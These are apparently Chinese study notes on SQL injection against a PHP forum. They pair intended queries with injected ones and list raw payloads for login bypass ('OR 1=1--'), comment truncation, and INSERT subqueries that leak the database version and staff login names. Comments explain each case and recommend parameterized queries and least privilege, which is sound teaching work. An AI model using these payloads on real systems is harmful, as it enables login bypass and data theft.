SQL注入,就是把恶意的SQL片段随输入传送给伺服器;伺服器把它直接拼接进查询字符串,数据库便会把它当作语句的一部分执行。
(恶意代码在客户端运行时自动执行的情形属于XSS,不是SQL注入。)根本原因是用户输入未经参数化就被拼进SQL,使用预处理语句(参数化查询)即可避免。
这是一个论坛系统。
攻击思路:
1. 检查输入接受哪些标签和符号(即哪些没有被过滤或转义)。
2. 尝试搞清楚数据库的表结构,和PHP业务逻辑。
3. 提交恶意代码,或恶意SQL语句。
-- Illustrative pairs: the query the application intends, followed by the
-- query the database actually receives once unescaped input is concatenated in.
-- Binding postId / staffId / login values as parameters prevents every
-- variant below, because bound input is never parsed as SQL.

-- Intended query: fetch the single post with postId 38.
SELECT * FROM posts WHERE postId = 38
-- After injection: `--` starts a comment, so the WHERE clause is dropped and
-- every row of posts is returned.
SELECT * FROM posts -- WHERE postId = 38
-- Intended query: look up one staff account by its numeric id.
SELECT * FROM staff_login WHERE staffId = 32
-- After injection: `OR 1 = 1` is always true, so the filter matches every row
-- of staff_login.
SELECT * FROM staff_login WHERE staffId = 32 OR 1 = 1
-- Login check after injection: AND binds tighter than OR, so the predicate is
-- (name matches AND password matches) OR 1=1, which is true for every row;
-- the trailing `--` comments out whatever the application appended.
-- NOTE(review): the password is compared as a plain literal, which suggests it
-- is stored unhashed; confirm against the schema.
SELECT * FROM staff_login WHERE staffLoginName = 'kk' AND staffPassword = '1234' OR 1=1 --
1234' OR 1 =1-- OR 1=1'
1234' OR 1 =1-- OR 1=1
1234' OR 1 =1--'
-- The login query laid out one clause per line, showing where the submitted
-- password value lands after concatenation.
SELECT *
FROM staff_login
WHERE staffLoginName = '123'
AND staffPassword = '1234'
-- The quote inside the input closed the string literal above; `OR 1 =1` is now
-- part of the predicate and the text after `--` is ignored as a comment.
OR 1 =1-- OR 1=1'
-- INSERT after injection: a scalar subquery sits in the postMessage position,
-- so the database version string is stored as the post body.
-- NOTE(review): presumably the post is then rendered back to the forum, which
-- turns this into information disclosure; confirm against the page logic.
INSERT INTO posts (postTitle, postMessage, postTime) VALUES ('123', (select version()) , '123')
23', (SELECT version() limit 1,1) , '123') -- OR 1=1
-- INSERT after injection: the input closes the VALUES list itself, and `--`
-- comments out the tail the application appended, so all three column values
-- (including postTime) come from the submitted text.
INSERT INTO posts (postTitle, postMessage, postTime) VALUES ('123', '123', '123') -- OR 1=1', '2017-04-15')
-- A subquery in the postMessage position copies a staffLoginName from
-- staff_login into the post, i.e. data from an unrelated table leaks through
-- the forum's own INSERT.
INSERT INTO posts (postTitle, postMessage, postTime) VALUES ('123', (SELECT staffLoginName FROM staff_login WHERE staffId = 3) , '123')
-- Same pattern with LIMIT 0 , 1 so the subquery yields a single row, plus the
-- trailing `--` that discards the application's original tail.
INSERT INTO posts (postTitle, postMessage, postTime) VALUES ('123', (SELECT staffLoginName FROM staff_login WHERE staffId = 4 LIMIT 0 , 1) , '123') -- OR 1=1', '123', '2017-04-15')
-- Without the WHERE filter: the subquery returns the first row of staff_login.
-- Least-privilege note: a forum posting account that has no SELECT right on
-- staff_login would make these subqueries fail even if injection is present.
INSERT INTO posts (postTitle, postMessage, postTime) VALUES ('123', (SELECT staffLoginName FROM staff_login LIMIT 0 , 1) , '123') -- OR 1=1', '123', '2017-04-15')